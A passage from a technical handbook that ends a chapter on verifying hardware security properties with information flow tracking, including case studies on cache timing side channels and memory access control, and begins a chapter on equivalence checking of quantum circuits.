cannot provide the needed information. Finally, Fig. 5c illustrates a circuit with a
conditional flow: depending on the value of S, information will flow either from
A or B to O. (Information always flows from S to O.) However, the COI analysis
will put both A and B in the COI set and has no way to make note of the conditional
nature of the flow.
Model checking. A more powerful form of static analysis is model checking.
Commonly used model checking engines include bounded model checking (BMC), in
which the design is unrolled so that a new logical formula representing the design is
created for each clock cycle represented (Biere et al. 2003); IC3 or property-directed
reachability, which does not require unrolling a design but instead reasons about the
reachability of a “bad” state from a given state (Bradley 2011; Een et al. 2011); and
engines based on binary decision diagrams (BDDs) which are used to efficiently
represent sets of states and their transitions. The chapter on bit-level model checking
describes the various techniques for sequential model checking in detail.
An out-of-the-box use of model checking in commercial verification engines cannot
verify hyperproperties, which include information flow properties. However,
by carefully setting up the problem statement, model checking can be used to verify
some types of hyperproperties called k-safety properties. Information flow proper-
ties are k-safety properties, and in particular, they are two-safety properties. The way
to use model checking to verify two-safety properties is to use self-composition, a
technique in which two identical instances of a design are combined in parallel to
make one large design, which is then fed to the model checker (Terauchi and Aiken
2005). Going back to the AES example from earlier, two instances of the design, say
AES1 and AES2 , are combined to create AES. The model checker can then verify
the property rst1 = rst2 ∧ data1 = data2 → rdy1 = rdy2 of this combined
design. Model checking is expensive: the size and complexity of the satisfiability
queries grow quickly, and requiring two instances of a design doubles the starting
complexity. For this reason, model checking information flow properties is limited
to relatively small designs or to individual components of a design.
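A minimal self-composition sketch is shown below, assuming an AES module with the interface of Fig. 4a (the module name and port widths are placeholders). The two-trace property of Eq. (1) becomes an ordinary single-trace assertion over the combined design:

// Two identical instances share rst and data; only the keys may differ.
module aes_selfcomp (
  input logic         clk,
  input logic         rst,
  input logic [127:0] data,
  input logic [127:0] key1,
  input logic [127:0] key2
);
  logic rdy1, rdy2;

  aes inst1 (.clk(clk), .rst(rst), .data(data), .key(key1), .rdy(rdy1));
  aes inst2 (.clk(clk), .rst(rst), .data(data), .key(key2), .rdy(rdy2));

  // If the model checker can make rdy1 and rdy2 diverge, information
  // flows from key to rdy.
  assert property (@(posedge clk) rdy1 == rdy2);
endmodule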
Dynamic Analysis
In dynamic analysis, it is the behavior of the design as it is simulated (or executed)
that is analyzed. The analysis tool can be external to the design, in which case the
tool can monitor only the input and output behaviors of the design. If, however,
the behavior of internal signals needs to be analyzed, then the design itself must
first be instrumented – modified in such a way that the logic needed for analysis is
incorporated into the design itself.
Trace-based analysis methods do not apply to information flow properties, and
dynamic analysis is a trace-based method: the behavior of a trace of execution is
observed and analyzed by the tool. However, by using information flow tracking,
dynamic analysis can be made applicable to the study of information flow proper-
ties (Tiwari et al. 2009). The design is instrumented to track how a particular input
signal is affecting every other signal in the design. At the end of any single trace of
execution, the added tracking logic has captured how information has flowed from
the input signal of interest.
To understand how this works, consider the simple AND gate in Fig. 6. In this
example information flow tracking is used to expose how and when information
from signal B can flow to output O. The original AND gate is on top, and the
added tracking logic, in this case a second AND gate, is on the bottom. The new
signals BT and OT track the information as it flows through the circuit. Going back
to the Denning model of information flow, BT, OT, and the second AND gate are
implementing the class combining operator ⊕ of the underlying model.
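As a Verilog sketch (module and port names are assumptions of this illustration), the instrumented gate of Fig. 6 could look as follows:

module and_ift (
  input  wire A, B,   // original functional inputs
  input  wire B_T,    // taint label of B (1 = tainted)
  output wire O,      // original functional output
  output wire O_T     // taint label of O
);
  assign O   = A & B;    // the original AND gate
  assign O_T = A & B_T;  // tracking logic: B's taint reaches O only when A = 1
endmodule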
Verification Tools
Simulation-Based Verification
In simulation-based verification, the design is simulated and monitored to check
whether the specified properties are met. The designer must provide a testbench
that sufficiently exercises the design to
find possible property violations. Simulation-based verification tools cannot prove
the correctness of a design; if no property violation is found, it is possible that the
testbench was insufficiently complete. On the other hand, if a property violation
is found, the root-cause analysis is simplified as the testbench provides the exact
sequence of inputs that caused the property violation.
One commercial tool using information flow tracking is Radix-S from Tortuga
Logic (Radix-S). The technology behind Tortuga Logic was first developed in
academic research (for a survey, see Hu et al. 2021). Academic research has
also demonstrated the use of information flow tracking to find timing channels in
addition to data channels (Ardeshiricham et al. 2017).
Formal Verification Methods
The state of the art in formal verification of information flow properties uses a form
of equivalence checking. The idea is similar in spirit to the use of self-composition
with model checking described above and can be used to demonstrate determinism.
The goal is to verify that a given destination signal is determined only by the
known, allowed source signals. In other words, there is no additional, illegal flow of
information from a given source signal to a given destination signal. In equivalence
checking, two versions of a design are proven to exhibit the same behavior given
the same environment and inputs. To verify determinism, two copies of a design are
created, and in both, the known sources of information are constrained to be equal.
Sequential equivalence checking is done to verify that the destination signal in both
copies will be equal. If it is possible for the two copies to diverge, then there exists
some additional path of information flow to the destination.
A benefit of formal verification methods is that the result is not dependent on
testbench coverage. If a violation is not found, then a violation does not exist.
However, in order to handle large-scale designs, engineers often have to introduce
suitable abstractions, and finding the right abstraction can be challenging. In
addition, if a violation is found, performing the root-cause analysis can be difficult.
Commercial tools that perform formal verification of information flow proper-
ties include JasperGold from Cadence (JasperGold), Questa Secure Check from
Siemens (Questa Secure Check), and Formal Security Verification from Synop-
sys (VC Formal).
Case Studies
This section presents two case studies for performing security verification of a
hardware architecture description. The first case study performs security verification
of a cache specifically targeting timing side channels. The second case study verifies
memory access control systems – an important aspect of modern secure computing
systems. In each case, the threat model is described, the assets are defined, and
example security properties are presented.
Cache Timing Side Channels
Caches are crucial for high-performance computer architectures and present in all
but the simplest microprocessors. Caches take advantage of spatial and temporal
locality in data access patterns. When the processor makes a memory
transaction, it assumes that data and its neighboring values will likely be accessed
again in the near future and thus keeps them in the faster, smaller cache memory.
When a processor requests data that was already loaded into the cache, it is returned
quickly (typically within a few cycles). When that data is not in the cache, the
cache itself must request it from another slower but larger memory (which typically
takes tens of cycles) during which time the cache stalls. The variation in the time
of retrieving data results in a timing side channel (Percival 2005). This case study
describes how to verify the existence of potential information leakage via a cache
timing side channel. This leakage is powerful and a key element of Spectre (Kocher
et al. 2019), Meltdown (Lipp et al. 2018), Foreshadow (Van Bulck et al. 2018), and
other architectural security attacks.
Figure 7 shows a diagram of a cache. The cache sits between a processor (left
interface) and another memory (right interface). The cache stores a number of cache
data lines each with metadata that includes their valid v bit, its corresponding
memory tag, and its associated processor ID pid. The PID is used to differen-
tiate between users, secure/insecure mode, etc. The Processor Transceive
Logic takes as input write data wr, a read/write address addr, write (wr_req)
and read request (rd_req) signals, and a process ID pid. The outputs are the
processor’s requested read data rd and the stall signal indicating whether the
cache is waiting for data. The Memory Transceive Logic interfaces with
another larger and slower memory, e.g., a lower-level cache or off-chip DRAM.
This interface has an address addr and rd and wr busses that transfer cache
lines between the cache and the memory. The terminology processor.rd and
memory.rd are used when needed to disambiguate any unclear signal references.
Fig. 7 The case study aims to understand potential threats related to a cache timing side channel
attack. The security verification focuses on whether information can leak from a sensitive process
(PID i) to another untrusted process (PID j) via the timing behavior of a cache. IFT can determine
such complex interactions
Assume that a threat model views a cache side channel as a security vulnerability.
Thus, the security verification process aims to understand whether the cache is
susceptible to an attack. The first responsibility is to identify the assets – what
information needs protection, when is this information exposed to the cache, and
where should it not flow? Specifying this in a manner that the IFT tool can
understand involves interfacing with the security class labels. Digging further into
the example will provide details on how and when to set and check the labels to
verify a cache timing side channel.
Assume that the threat model requires that there is no timing side channel
between PID i and PID j . Further, assume that PIDs are securely provided via the
pid signal during processor read/write requests. One important cache side channel
involves the leakage of information related to the memory accesses performed by
some sensitive computation, in this case any computation performed by PID i.
Thus, it is determined that processor.addr is an important asset that contains
information that should not be leaked. processor.addr does not always carry
information related to PID i; its label should only be marked high (H ) when PID i
is using the cache. Thus, the addr_proc label is set to H only if pid == i. The
goal is to check when any sensitive address information about PID i flows from the
cache to the processor while PID j is executing. processor.rd is one important
signal where this information could flow. Thus, the analysis should assert that the
processor.rd label is always L and report scenarios when it could become H,
as those are the conditions under which information about PID i’s memory access
pattern leaks to PID j through a cache timing side channel. Finally, all storage
objects (registers, Verilog variables, etc.) outside of the addr_proc signals should
be initially marked as L.
IFT tools provide the capability to track different types of flows. In this case, the
goal is to investigate timing flows, and thus, analysis requires an IFT tool that can
track timing flows. Functional flows and timing flows differ in how the information
is being transferred. Functional flows transfer information directly through the
functional values of the storage object. Explicit flows are an example of a functional
flow. Timing flows manifest themselves via the time at which the result is delivered.
In this cache timing side channel example, the goal is to know if the timing
behavior of the cache provides any information to PID j about how PID i previously
used the cache. A common timing flow manifests itself via the processor.rd
signal, specifically the time at which valid data is presented on that signal. Note
that there may be a timing flow without a functional flow since the value of
processor.rd will not vary (only the time at which that same value is delivered).
These ideas are formalized by Oberg et al. (2014).
An IFT tool that tracks both functional flows and timing flows, e.g., Clepsy-
dra (Ardeshiricham et al. 2017), will provide separate labels and check the status of
the functional (f ) and timing labels (t). The notation used here appends the labels to
storage objects. For example, processor.addr.f and processor.addr.t
indicate the functional flow label and timing flow label (respectively) for storage
object processor.addr. Functional flows and timing flows are not independent.
A functional flow is transferred to a timing flow in the case(s) when that functional
value is assigned conditionally. This causes a variation in the time at which that
functional value is set, i.e., there is a timing flow.
Going back to the case study, the goal is to understand if the functional values
processor.addr ever leak via a timing channel. Thus, the analysis requires
setting processor.addr.f = H when PID i is using the cache and checking
whether the H label can ever flow to processor.rd.t (the timing label of the
read data) when pid == j.
Listing 1 provides an assertion-based IFT property for determining if a cache
exhibits a timing side channel via its access patterns. The assertions work directly
on the labels and use a labeling system similar to Clepsydra (Ardeshiricham et al.
2017) for verifying functional and timing flows. The default functional f and timing
t labels are set to L. The processor.addr.f functional label is set to H
when PID i is using the cache, indicating that this information will be tracked.
The analysis must then determine if any information about how PID i used the
cache is leaked to processor.rd via a timing channel. This is reflected in the
processor.rd.t value. If it is H , that indicates that processor.rd contains
some information about processor.addr via a timing channel.
Listing 1 Assertion-based property covering cache timing side channel from Fig. 7
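A plausible sketch of such an assertion-based property follows; the signal-level encoding is an assumption of this sketch (each label exposed as a separate signal, e.g., processor.addr.f as processor_addr_f, with H = 1 and L = 0, and PID_I and PID_J as illustrative constants):

// Tag addresses as H while the sensitive process PID i uses the cache;
// all other labels default to L.
assign processor_addr_f = (pid == PID_I);

// While PID j executes, the timing label of the read data must stay L.
// A violation exposes a cache timing channel from PID i to PID j.
assert property (@(posedge clk)
  (pid == PID_J) |-> (processor_rd_t == 1'b0));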
All IFT tools provide a means of setting and checking the IFT labels. That may
be done directly, as shown above, or through some higher-level property
specification. One common IFT property language feature is the “no flow” operator
=/=> which indicates that information from a source storage object should not flow
to a sink storage object, i.e., source =/=> sink. This is equivalent to setting
the source label H and verifying that sink label stays L.
In addition to the =/=> operator, IFT tools often have a way to specify the
conditions under which information should be tracked (i.e., when to set the source
label) and conditions under which flows are allowable (i.e., when to check if the
sink label is H). Listing 2 provides a cache side channel property using the no-flow
operator:
Listing 2 No-flow property covering cache timing side channel from Fig. 7
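In a generic no-flow notation (the concrete syntax differs between tools), such a property might read:

// Addresses issued by PID i must not flow - even via timing - to the
// read data observed by PID j.
assert iflow (
  processor.addr when (pid == PID_I)
    =/=>
  processor.rd.t when (pid == PID_J)
);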
Regardless of how the property is specified, a standard cache without any timing
side channel mitigation should fail security verification related to a timing channel.
That is, the verification process will find at least one scenario in which information
about PID i’s memory accesses is leaked to PID j via a timing channel on the
processor.rd object. Without any mitigation in place, that scenario would occur
when PID j accesses a cache line that was previously accessed by PID i.
Memory Access Control

The second case study considers the memory access control wrapper shown in
Fig. 8, which mediates requests between a CPU core and memory-addressable
resources.
Fig. 8 The access control wrapper inspects memory requests from the CPU core and relays them
to the memory interconnect only if they adhere to the policy set in the configurable access control
manager, which is programmed by a trusted entity. Any illegal accesses are stopped at the source
and the trusted entity is alerted via an interrupt
Listing 3 A trace property that states the AXI manager M address write channel is properly
disabled during an interrupt
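A plausible SVA sketch of such a trace property (the AXI signal and interrupt names are illustrative, not taken from the Aker repository):

// While the interrupt is raised, the manager M may not initiate any
// transfer on the AXI write-address channel.
assert property (@(posedge clk)
  interrupt |-> !M_AWVALID);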
Listing 4 An information flow property that states that information from the CPU core manager
M interface should never flow outside of the access control wrapper when that information
corresponds to an illegal request
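A corresponding sketch in the same generic no-flow notation, with illegal_req as a hypothetical flag raised by the wrapper when a request violates the configured policy:

// Data from an illegal request must never leave the access control wrapper.
assert iflow (
  M.wdata when (illegal_req)
    =/=>
  wrapper.out
);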
Researchers have defined over 300 properties related to basic security behaviors
of the access control wrapper; those properties along with the hardware description
of the access control wrapper are available in the Aker open-source repository (Aker
Github Repository). These properties were inspired by MITRE Common Weakness
Enumerations (CWEs) (The Common Weakness Enumeration Official Webpage
2022), specifically those related to hardware design, and include a mix of trace
properties and hyperproperties.
Property generation was far and away the most challenging, time-consuming, yet
important part of the security validation process. Automating property generation is
invaluable in making security validation faster and more comprehensive, and new
research has begun to do just that (Deutschbein et al. 2021, 2022; Zhang et al.
2017). Potentially even more valuable is providing the engineer with insights into
the design under validation, which could lead to the specification of additional
properties and the discovery of new weaknesses and vulnerabilities.
Conclusion

Information flow tracking provides a principled way to verify hardware security
properties related to confidentiality, integrity, and timing. Because such properties
are hyperproperties rather than trace properties, they require dedicated techniques:
dynamic analysis with added tracking logic, or static approaches such as self-
composition with model checking. As the case studies on cache timing side channels
and memory access control illustrate, IFT tools make it possible to label security
assets and systematically uncover illegal flows.
References
Aftabjahani S, Kastner R, Tehranipoor M, Farahmandi F, Oberg J, Nordstrom A, Fern N, Althoff
A (2021) Special session: CAD for hardware security – automation is key to adoption of solutions.
In: 2021 IEEE 39th VLSI Test Symposium (VTS). IEEE, pp 1–10
Aker Github Repository. https://github.com/KastnerRG/AKER-Access-Control
Roscoe A (1995) CSP and determinism in security modelling. In: Proceedings 1995 IEEE
Symposium on Security and Privacy, pp 114–127
Sabelfeld A, Myers AC (2003) Language-based information-flow security. IEEE J Sel Areas
Commun 21(1):5–19
Terauchi T, Aiken A (2005) Secure information flow as a safety problem. In: Proceedings
International Static Analysis Symposium. Springer, pp 352–367
The Common Weakness Enumeration Official Webpage (2022). MITRE, https://cwe.mitre.org/
Tiwari M, Wassel HM, Mazloom B, Mysore S, Chong FT, Sherwood T (2009) Complete informa-
tion flow tracking from the gates up. In: Proceedings of the 14th International Conference on
Architectural Support for Programming Languages and Operating Systems, pp 109–120
Van Bulck J, Minkin M, Weisse O, Genkin D, Kasikci B, Piessens F, Silberstein M, Wenisch TF,
Yarom Y, Strackx R (2018) Foreshadow: extracting the keys to the Intel SGX kingdom with
transient out-of-order execution. In: 27th USENIX Security Symposium (USENIX Security
18), pp 991–1008
VC Formal. Synopsys. [Online]. Available: https://www.synopsys.com/verification/static-and-
formal-verification/vc-formal.html
Zeldovich N, Boyd-Wickizer S, Kohler E, Mazieres D (2011) Making information flow explicit in
HiStar. Commun ACM 54(11):93–101
Zhang R, Stanley N, Griggs C, Chi A, Sturton C (2017) Identifying security critical properties for
the dynamic verification of a processor. In: Proceedings of the 22nd International Conference on
Architectural Support for Programming Languages and Operating Systems (ASPLOS). ACM
40 Verification of Quantum Circuits

Robert Wille and Lukas Burgholzer
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1414
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1416
Quantum Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1416
Quantum Circuit Compilation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1418
Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1420
Classical Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1420
Quantum Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1421
Formal Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1423
Decision Diagrams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1424
General Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1425
Alternating Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1426
Designing a Strategy for Verifying Compilation Flow Results . . . . . . . . . . . . . . . . . . . . . 1427
Simulative Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1430
Verification Schemes Based on Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1431
Stimuli Generation Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1432
Resulting Quantum Circuit Equivalence Checking Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1436
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1438
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1438
R. Wille
Chair for Design Automation, Technical University of Munich, Munich, Germany
Software Competence Center Hagenberg GmbH (SCCH), Hagenberg im Mühlkreis, Austria
e-mail: [email protected]; [email protected]
L. Burgholzer
Institute for Integrated Circuits, Johannes Kepler University Linz, Linz, Austria
e-mail: [email protected]
Abstract
We are at the dawn of a new “computing age” in which quantum computers will
find their way into practical applications. Although quantum computers work
differently than classical machines, the design flow for realizing applications is
similar: first, the desired functionality/application is described on a high level.
Then, it is compiled down to a description (usually called quantum circuit) that
can be executed on an actual machine. During this process, lots of constraints
have to be fulfilled, and optimizations are applied to reduce the circuit’s size
and, hence, improve the actual performance on the quantum computer – all
of which are highly nontrivial steps. As in conventional design, sooner or
later, it is essential to check whether the resulting realization is correct –
motivating verification. This chapter reviews and provides a summary of work
in this regard. Considering the challenges currently seen in the verification
of (comparatively simpler) classical systems, this may provide the basis for
preventing the emergence of a verification gap in quantum computing.
Introduction
The desired functionality is first described at a high level and then compiled down
to a low-level description (e.g., a sequence of dedicated microwave pulses applied
to the qubits) that can be executed on a real quantum computer (Amy et al. 2013;
Barenco et al. 1995; Maslov 2016; Giles and Selinger 2013; Zulehner and Wille
2018) – usually called a
quantum circuit. Additionally, physical constraints of the target hardware have to
be taken into account, e.g., not all qubits may directly interact with each other and
different operations take different amounts of time (Zulehner et al. 2019d; Smith and
Thornton 2019; Wille et al. 2019; Li et al. 2019; Matsuo et al. 2019; Murali et al.
2019; Siraichi et al. 2018; Amy and Gheorghiu 2019; Zulehner and Wille 2019a;
Burgholzer et al. 2022a). Finally, several optimizations are applied to reduce the
circuit’s size and, hence, increase the expected fidelity when executing the circuit
on the actual quantum computer (Itoko et al. 2020; Vidal and Dawson 2004; Nam
et al. 2018; Hietala et al. 2019). These tasks are often referred to as compilation
(since eventually an “assembly program” results), synthesis (since quantum circuits
often serve as means of description), decomposition (since high-level operations are
broken down to elementary operations), or mapping (since qubits of the algorithms
are mapped to the physical qubits of the target architecture).
All these steps (in the following summarized as compilation) result in different
representations of the considered functionality, which significantly differ in their
basis operations and structure but are still supposed to be functionally equivalent.
Consequently, checking whether the original functionality is indeed maintained
throughout all these different abstractions becomes increasingly relevant in order
to guarantee a consistent and error-free design flow. This is similar in the classical
realm where, e.g., descriptions at the electronic system level, the register transfer
level, and the gate level exist. Here, these descriptions are verified using design
automation expertise leading to efficient methods for verification (more precisely,
for equivalence checking) in order to guarantee correctness throughout the design.
However, since quantum circuits additionally employ quantum-mechanical effects,
such as superposition and entanglement, those methods cannot be used for verifi-
cation in the quantum realm in an out-of-the-box fashion. Accordingly, how to do
verification for quantum circuits has to be approached from a different perspective.
At first glance, these quantum characteristics make the problem of verification
harder – suddenly, circuits have to be supported which rely not only on 0s and
1s but also on superposition and entanglement. And indeed, this task has been proven
to be QMA-complete (The class QMA is the natural extension of the classical class
NP to the quantum computing world (Bookatz 2013).) (Janzing et al. 2005). But, at
the same time, the inherent reversibility of quantum computations offers potential
not available in classical computing. More precisely:
• It allows for formal equivalence checking of two circuits by proving that the
composition of one circuit with the inverse of the other implements the identity –
a structure that can be represented very efficiently. If conducted in a clever
fashion, this efficient representation can be maintained throughout the entire
verification process. Eventually, alternating between applications of gates from
either circuit allows verification to be conducted in an efficient fashion (under the
assumption that a suitable oracle can be derived).
• Moreover, quantum circuits tend to propagate even small errors: a single faulty
gate frequently affects most (if not all) of a circuit's functionality (as discussed later
in section "Simulative Verification"). Hence, nonequivalence can often be detected
by simulating the circuits with just a few (randomly chosen) stimuli.
This chapter sheds light on the challenges of quantum circuit verification and
also on how characteristics such as those above can be utilized to tackle them. To
this end, section “Background” provides the necessary background to keep this
chapter self-contained. Then, section “Verification” formulates the problem of ver-
ifying quantum circuits. Afterward, sections “Formal Verification” and “Simulative
Verification”, respectively, describe the formal and simulation-based verification
techniques for quantum circuits that make use of the characteristics mentioned
above. Eventually, the composition of both techniques into the first advanced
equivalence checking flow is described in section “Resulting Quantum Circuit
Equivalence Checking Flow”. Implementations of all the methods provided in this
chapter are publicly available as open source and can be accessed at
github.com/cda-tum/qcec. Thereby, the chapter provides the basis for preventing the emergence
of a verification gap in quantum computing as it is currently present for classical
circuits.
Background
This section briefly reviews the concepts of quantum computing and quantum circuit
compilation. For more detailed information, the interested reader is referred to the
provided references.
Quantum Computing
In quantum computing (Nielsen and Chuang 2010), the main computational unit
is the qubit. In contrast to classical bits, a single qubit q can be in an arbitrary
superposition of the basis states |0⟩ and |1⟩, i.e.,

|q⟩ = α_0 |0⟩ + α_1 |1⟩ with α_0, α_1 ∈ ℂ and |α_0|² + |α_1|² = 1.

Systems of multiple qubits are described by tensor products of single-qubit states.
In particular, an n-qubit computational basis state satisfies

|b_{n−1}⟩ ⊗ · · · ⊗ |b_0⟩ = |b_{n−1} … b_0⟩ = |∑_{i=0}^{n−1} b_i 2^i⟩.
In the circuit model of quantum computation, qubits are represented by wires and
are manipulated by quantum operations (quantum gates). Specifically, a quantum
circuit G with m gates, operating on n qubits, is denoted by G = g0 . . . gm−1 , where
each gi represents a quantum gate acting on (a subset of) n qubits. This is usually
visualized through quantum circuit diagrams, where the qubit wires are drawn as
horizontal lines, gates are drawn using a variety of symbols, and progression of
time is assumed to happen from left to right.
An important class of gates are controlled operations, where a NOT operation
(denoted by ⊕) is applied to a target qubit only if all control qubits
(denoted by •) are in state |1⟩. In case there is only one control qubit, such a gate is
also called CNOT or controlled-NOT, while in case of two control qubits, it is also
called a Toffoli gate.
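As a minimal illustration of this circuit model, the following sketch (using IBM
Qiskit; the concrete gates are chosen for illustration only and do not reproduce the
circuit of Fig. 1) constructs a three-qubit circuit containing a NOT, a CNOT, and a
Toffoli gate:

from qiskit import QuantumCircuit

qc = QuantumCircuit(3)  # three qubits q0, q1, q2
qc.x(2)                 # NOT gate on q2
qc.cx(0, 1)             # CNOT: control q0, target q1
qc.ccx(0, 1, 2)         # Toffoli: controls q0 and q1, target q2
print(qc.draw())        # render the circuit diagram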
Quantum Circuit Compilation
Initially, quantum algorithms are described in a way which is agnostic of the device
they are planned to be executed on. However, physical devices today impose several
constraints on the circuits to be executed. Thus, just as in classical computing, a
conceptual algorithm needs to be compiled to the targeted architecture. Compilation
of quantum circuits addresses three kinds of restrictions which limit the usability of
a quantum computer: (1) the limited gate-set natively supported by the device,
(2) the limited connectivity between its qubits, and (3) the short coherence time
and limited gate fidelity of current devices.
The first two, i.e., the limited gate-set and connectivity, constitute hard constraints –
a computation not conforming to these restrictions may not be executed on
the device. In contrast, the short coherence time and limited gate fidelity represent
soft constraints – a quantum circuit may be executed on a device, but it is not
guaranteed to produce meaningful results if the circuit, e.g., is too large for the
state to stay coherent.
In order to tackle these limitations, first, the gates of the original quantum circuit
are synthesized to the gate-set supported by the targeted device. Most importantly,
since devices typically only support up to two-qubit gates, any gate acting on
more than two qubits is broken down into “elementary” gates. This process may
require the use of ancillary qubits for realizing the desired operation, e.g., for the
decomposition of gates with many controls.
Example 2. Consider again the circuit G from Example 1 as shown in Fig. 1a. If this
circuit is to be executed on a system that only supports arbitrary single-qubit gates
and CNOTs, the Toffoli gate (the two-controlled NOT) first has to be decomposed
into this gate-set. One possible synthesized version is shown in Fig. 1b. It takes six
CNOTs, nine single-qubit gates, and no additional ancillaries to realize the desired
gate.
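This decomposition step can be reproduced with common compilers. As a hedged
sketch (exact gate counts may vary between tool versions), decomposing a Toffoli
gate into arbitrary single-qubit gates and CNOTs with Qiskit could look as follows:

from qiskit import QuantumCircuit, transpile

qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)  # a single Toffoli gate
# Synthesize to a gate-set of arbitrary single-qubit gates ('u') and CNOTs
decomposed = transpile(qc, basis_gates=["u", "cx"])
print(decomposed.count_ops())  # typically six 'cx' gates plus single-qubit gates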
Now, the circuit just contains elementary gates supported by the device, but it may
not yet conform to the device’s limited connectivity. Thus, the quantum circuit is
mapped to the target architecture, i.e., a mapping between the circuit’s logical
and the device’s physical qubits is established. Several heuristics for determining
a suitable initial mapping exist – from a trivial one-to-one mapping (qi → Qi ) to
explicitly considering calibration data and picking the most reliable set of qubits
for the computation (Murali et al. 2019). However, in most cases, it is not possible
to globally define a mapping which conforms to all connectivity limitations. As a
consequence, the logical-to-physical qubit mapping is usually changed dynamically
throughout the circuit. Typically, this is accomplished by inserting SWAP gates into
the circuit – effectively changing the mapping of logical qubits to physical
qubits so that all operations can be executed while, at the same time, all connectivity
constraints are satisfied. Several approaches have been proposed for tackling this
immensely complex task (In fact, the mapping task has been shown to be NP-
complete (Siraichi et al. 2018).) (Zulehner et al. 2019d; Smith and Thornton 2019;
Wille et al. 2019; Li et al. 2019; Matsuo et al. 2019; Murali et al. 2019; Siraichi
et al. 2018; Amy and Gheorghiu 2019; Zulehner and Wille 2019a; Burgholzer et al.
2022a).
Example 3. Consider again the circuit G from Example 1, and assume that the
Toffoli gate has been synthesized as shown in Fig. 1b. Further, assume that the
circuit is to be executed on the IBMQ London architecture shown in Fig. 1c. Then,
Fig. 1d shows one possible circuit G̃ resulting from this mapping process. The
physical qubits Q0 , Q1 , and Q2 were chosen and initially assigned logical qubits q0 ,
q2 , and q1 , respectively. Just one SWAP operation applied to Q0 and Q1 (indicated
by ×) was added in the middle of the circuit in order to conform to the target’s
connectivity constraints (A SWAP operation is eventually realized using three CNOT
operations as indicated in the middle of Fig. 1.).
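Such a mapping can likewise be performed by off-the-shelf compilers. The following
sketch (the linear coupling map is a hypothetical stand-in for a device topology such
as the one in Fig. 1c) restricts the connectivity during compilation:

from qiskit import QuantumCircuit, transpile
from qiskit.transpiler import CouplingMap

coupling = CouplingMap([[0, 1], [1, 2]])  # hypothetical linear topology Q0-Q1-Q2
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
# Mapping inserts SWAPs (realized by CNOTs) where connectivity is violated
mapped = transpile(qc, coupling_map=coupling, basis_gates=["u", "cx"])
print(mapped.count_ops())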
After this step of the compilation flow, circuits are ready to be executed
on the targeted devices. However, the previous steps significantly increased the
size of these circuits – impacting the achievable performance due to the limited
coherence time and gate fidelity. Thus, several optimizations may be employed
to reduce the circuit’s size and, hence, improve the actual performance on the
quantum computer. This might include fusing consecutive gates acting on the same
qubits, cancelling adjacent gates that are inverse to one another (e.g., two consecutive
CNOT operations with the same control and target qubits), or more sophisticated
optimization techniques such as gate transformation and commutation (Itoko et al.
2020) or resynthesis of two-qubit unitary blocks (Vidal and Dawson 2004).
Example 4. Consider again the circuit G̃ from Example 3 shown in Fig. 1d that
has been mapped to the IBMQ London architecture. Applying single-qubit gate fusion and
adjacent-gate cancellation eventually eliminates nine single-qubit gates and
results in the optimized circuit G′ shown in Fig. 1e.
Verification
Classical Circuits
For classical circuits, two complementary techniques are typically employed to
check correctness:
– Formal verification (Biere and Kunz 2002; Drechsler 2004), which considers the
problem mathematically and proves that a circuit is correct with 100% certainty
– Simulation-based verification (Yuan et al. 2006; Bergeron 2006; Kitchen and
Kuehlmann 2007; Wille et al. 2009; Le et al. 2019; Laeufer et al. 2018), in
which certain input assignments (stimuli) are explicitly assigned to the circuit
and propagated through it and the outputs are compared to the expected values
Obviously, formal verification provides the best solution with respect to quality.
The corresponding methods are capable of efficiently traversing large parts of the
search space, e.g., by applying clever implications during the proof. The correspond-
ing techniques are, however, rather complex compared to their simulation-based
counterparts and, particularly for larger designs, often fail due to the exponential
complexity of the task.
Simulation is much easier to implement and very fast as long as only a limited
number of stimuli is applied. The problem obviously is the quality provided by
the applied set of stimuli. An exhaustive set of stimuli would show correctness
with 100% certainty but is practically intractable as this would eventually require
an exponential number of stimuli to simulate. Accordingly, methods such as
constraint-based random simulation (Yuan et al. 2006; Bergeron 2006; Kitchen
and Kuehlmann 2007; Wille et al. 2009), fuzzing (Le et al. 2019; Laeufer et al.
2018), etc. are key techniques to cope with this problem, while still maintaining
a high quality. Here, stimuli and/or data inputs are specifically generated (e.g.,
from constraints, mutations of randomly generated inputs, etc.) so that corner case
scenarios and/or a broad variety of cases are triggered. In doing so, errors that might
otherwise remain undetected are more likely to be found.
However, despite substantial progress that has been made in the past, e.g.,
on improving the efficiency of formal methods or on stimuli generation which
increases the coverage of simulative verification, verifying classical circuits remains
a challenge and, hence, is subject of further research.
Quantum Circuits
In the quantum realm, the verification problem can be stated in a similar fashion
as for classical circuits: given a circuit G, which acts as a specification (potentially
consisting of high-level operations or building blocks), and a quantum circuit G ,
which acts as an implementation, it shall be checked whether the implementation
